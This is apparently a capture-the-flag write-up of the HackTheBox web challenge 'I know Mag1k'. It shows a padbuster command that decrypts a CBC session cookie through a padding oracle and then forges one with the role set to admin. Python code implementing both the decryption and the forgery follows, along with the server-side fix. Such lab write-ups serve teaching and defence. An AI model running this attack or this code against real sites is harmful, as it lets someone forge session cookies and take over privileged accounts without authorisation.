Hi guys, today we will do the web challenge "I know Mag1k" on hackthebox.eu. Your task in this challenge is to get the profile page of the admin. Let's look at the site first.

As usual the site requires credentials. I went to its source code page to find some info, but I couldn't find anything helpful, so I tried other methods. I tried SQLi with many payloads, but the login doesn't seem to be affected by SQLi. Brute-forcing the password? I don't think that would be a good idea: if we could brute force the admin's password this would be a very easy challenge, and it isn't. Looking at the site again, it has a register page, so I went there, registered a new account and logged in with it. After logging in you will see a page like this.

I know that browsing normally won't give us more information, so I switched to doing all requests through Burp Suite. In Burp Suite, when I go to USER PROFILE, I see something like this in the cookie.

At this step I thought of a method that is useful here: a padding oracle attack. If you don't know about it you can google for more information; in short, the cookie is a CBC-encrypted value, and if the server responds differently when the decrypted cookie has invalid PKCS#7 padding, that difference is enough to decrypt the cookie byte by byte, and to encrypt a chosen value, without ever knowing the key. So what will I do? I will decrypt that cookie's value using the padbuster tool. First I will try this command.
padbuster http://docker.hackthebox.eu:57328/profile.php E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D 8 --cookies iknowmag1k=E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D --encoding 0 --auth username:password
Explanation of the command:
- http://docker.hackthebox.eu:57328/profile.php == the profile URL (the request padbuster replays with modified cookie values).
- E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D == the EncryptedSample, the current cookie value.
- 8 == the block size. A quick check: the sample is 76 Base64 characters with one '=' of padding, so it decodes to 56 bytes, which splits evenly into 8-byte blocks but not into 16-byte ones, so 8 is the block size to try.
- --cookies == the cookie header to send; the sample must appear in it so padbuster knows where to substitute its modified values.
- --encoding 0 == the encoding of the sample, 0 means Base64.
- --auth == HTTP basic authentication credentials (username:password).

The result after decrypting the cookie's value looks like the above: you can see that I am in the user role, and the task is to view the admin's page, so I will change my role to admin. To do that, use the previous command and append this argument:
-plaintext '{"user":"michael","role":"admin"}'
With that argument the tool uses the same oracle to encrypt the new value (again without knowing the key) and prints a cookie value we can use. Let's wait for the result.
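To show what padbuster is doing in both steps above (decrypting the cookie, then forging one with -plaintext), here is an added example written for this page; it is not part of the original write-up and not padbuster's code. The cipher, key and cookie are constructed stand-ins: a small Feistel block cipher with 8-byte blocks replaces whatever the challenge server actually used, and padding_oracle plays the role of profile.php answering differently on bad padding. The attacker-side functions only ever call that oracle; they never see the key.

```python
import hashlib
import hmac
import os

BLOCK = 8  # 8-byte blocks, the block size padbuster was given above


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# ---- Server side (constructed stand-in for the challenge's cookie encryption) ----
# Four Feistel rounds with an HMAC-SHA256 round function give a real, invertible 64-bit
# block cipher from the standard library. It is NOT the cipher the challenge used; the
# attack below never looks inside it, only at the padding check.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    prev = os.urandom(BLOCK)                 # the IV travels as the first block of the cookie
    out, padded = [prev], pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, token: bytes) -> bytes:
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def padding_oracle(key: bytes, token: bytes) -> bool:
    """The leak: a distinguishable answer when padding is bad (what profile.php gave away)."""
    try:
        unpad(cbc_decrypt(key, token))
        return True
    except ValueError:
        return False

# ---- Attacker side: needs only the oracle ----
def decrypt_block(oracle, block: bytes) -> bytes:
    """Recover the intermediate value D(block) one byte at a time, last byte first."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos                   # padding value we force at this step
        for guess in range(256):
            crafted = bytearray(BLOCK)
            crafted[pos] = guess
            for j in range(pos + 1, BLOCK):  # keep already-solved bytes padding-valid
                crafted[j] = inter[j] ^ padv
            if not oracle(bytes(crafted) + block):
                continue
            if pos == BLOCK - 1:             # rule out an accidental \x02\x02 (etc.) match
                crafted[pos - 1] ^= 0xFF
                if not oracle(bytes(crafted) + block):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a padding for byte %d" % pos)
    return bytes(inter)

def oracle_decrypt(oracle, token: bytes) -> bytes:
    """The first padbuster run: P_i = D(C_i) XOR C_{i-1}, block by block."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(_xor(decrypt_block(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def oracle_encrypt(oracle, plaintext: bytes) -> bytes:
    """The -plaintext run: pick any last block, then walk backwards setting C_{i-1} = D(C_i) XOR P_i."""
    padded = pad(plaintext)
    cur, out = bytes(BLOCK), [bytes(BLOCK)]  # any value works as the final block
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = _xor(decrypt_block(oracle, cur), padded[i:i + BLOCK])
        out.insert(0, cur)
    return b"".join(out)                     # out[0] is the forged IV

def demo():
    key = os.urandom(16)                     # the attacker never sees this
    cookie = cbc_encrypt(key, b'{"user":"michael","role":"user"}')  # constructed cookie
    oracle = lambda token: padding_oracle(key, token)
    recovered = oracle_decrypt(oracle, cookie)
    forged = oracle_encrypt(oracle, b'{"user":"michael","role":"admin"}')
    return recovered, unpad(cbc_decrypt(key, forged))
```

Each byte costs at most 256 oracle queries (plus the false-positive check on the last byte), so a 5-block cookie takes a few thousand requests in each direction; that is the waiting padbuster does. The fix on the server side is to authenticate the cookie (an HMAC over the ciphertext, or an AEAD mode) and reject it before any padding is inspected, so there is no padding error to observe.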

Now we send the request with the new cookie value.

You can see that after requesting with the new cookie value we get the flag. Thanks for reading!!!